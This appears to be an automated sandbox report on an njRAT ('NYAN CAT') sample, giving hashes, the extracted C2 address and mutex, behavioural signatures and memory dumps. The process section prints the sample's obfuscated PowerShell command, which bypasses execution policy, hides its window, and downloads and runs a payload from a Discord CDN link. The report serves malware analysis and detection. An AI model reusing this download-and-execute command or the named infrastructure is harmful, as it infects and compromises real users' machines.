njrat | 80cc399540ed18faa7019f09dd2ac663689fa8ea246209309e9051b5b04110d5

General

Target

squadw.vbs
Size

825B
MD5

fe6492eed50dc9d3d807b03aae535d79
SHA1

bff235e3d137717701b0095eee41582ca7e39c0a
SHA256

80cc399540ed18faa7019f09dd2ac663689fa8ea246209309e9051b5b04110d5
SHA512

31773f3f1839282f0715bb0a2a9ec5da4e3899608fede4546eca8438a479663315d1c5edb66c0bf25f533f061357eaca40018ee85cfb353f967f56dbc27645d8

Score

10^/10

njrat nyan cat trojan

Malware Config

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

hermes2021.duckdns.org:4433

Mutex

5042310807584f1a993

Attributes

reg_key
5042310807584f1a993
splitter
@!#&^%$

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exe

flow	pid	process
12	1020	powershell.exe
27	1020	powershell.exe
36	1020	powershell.exe
37	1020	powershell.exe
39	1020	powershell.exe
40	1020	powershell.exe
41	1020	powershell.exe
43	1020	powershell.exe
44	1020	powershell.exe
45	1020	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

1020 powershell.exe
1020 powershell.exe
1020 powershell.exe

pid	process
1020	powershell.exe
1020	powershell.exe
1020	powershell.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe
Token: 33	1020	powershell.exe
Token: SeIncBasePriorityPrivilege	1020	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 996 wrote to memory of 1020	996	WScript.exe	powershell.exe
PID 996 wrote to memory of 1020	996	WScript.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\squadw.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/878366592180813876/894630606460301392/Main.png');$results
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1020-114-0x0000000000000000-mapping.dmp

Download
memory/1020-116-0x0000021244DE0000-0x0000021244DE2000-memory.dmp

Filesize
8KB

Download
memory/1020-115-0x0000021244DE0000-0x0000021244DE2000-memory.dmp

Filesize
8KB

Download
memory/1020-117-0x0000021244DE0000-0x0000021244DE2000-memory.dmp

Filesize
8KB

Download
memory/1020-118-0x0000021244DE0000-0x0000021244DE2000-memory.dmp

Filesize
8KB

Download
memory/1020-120-0x000002125F670000-0x000002125F671000-memory.dmp

Filesize
4KB

Download
memory/1020-119-0x0000021244DE0000-0x0000021244DE2000-memory.dmp

Filesize
8KB

Download
memory/1020-121-0x0000021244DE0000-0x0000021244DE2000-memory.dmp

Filesize
8KB

Download
memory/1020-123-0x0000021244DE0000-0x0000021244DE2000-memory.dmp

Filesize
8KB

Download
memory/1020-124-0x0000021244DE0000-0x0000021244DE2000-memory.dmp

Filesize
8KB

Download
memory/1020-125-0x0000021244DE0000-0x0000021244DE2000-memory.dmp

Filesize
8KB

Download
memory/1020-129-0x000002125EDD0000-0x000002125EDD2000-memory.dmp

Filesize
8KB

Download
memory/1020-130-0x000002125EDD3000-0x000002125EDD5000-memory.dmp

Filesize
8KB

Download
memory/1020-141-0x000002125F7F0000-0x000002125F7F1000-memory.dmp

Filesize
4KB

Download
memory/1020-152-0x000002125FC00000-0x000002125FC01000-memory.dmp

Filesize
4KB

Download
memory/1020-157-0x0000021244DE0000-0x0000021244DE2000-memory.dmp

Filesize
8KB

Download
memory/1020-158-0x000002125EDD6000-0x000002125EDD8000-memory.dmp

Filesize
8KB

Download
memory/1020-159-0x000002125F7D0000-0x000002125F7D2000-memory.dmp

Filesize
8KB

Download
memory/1020-160-0x000002125F7E0000-0x000002125F7E2000-memory.dmp

Filesize
8KB

Download
memory/1020-161-0x000002125F830000-0x000002125F838000-memory.dmp

Filesize
32KB

Download
memory/1020-162-0x0000021244DE0000-0x0000021244DE2000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads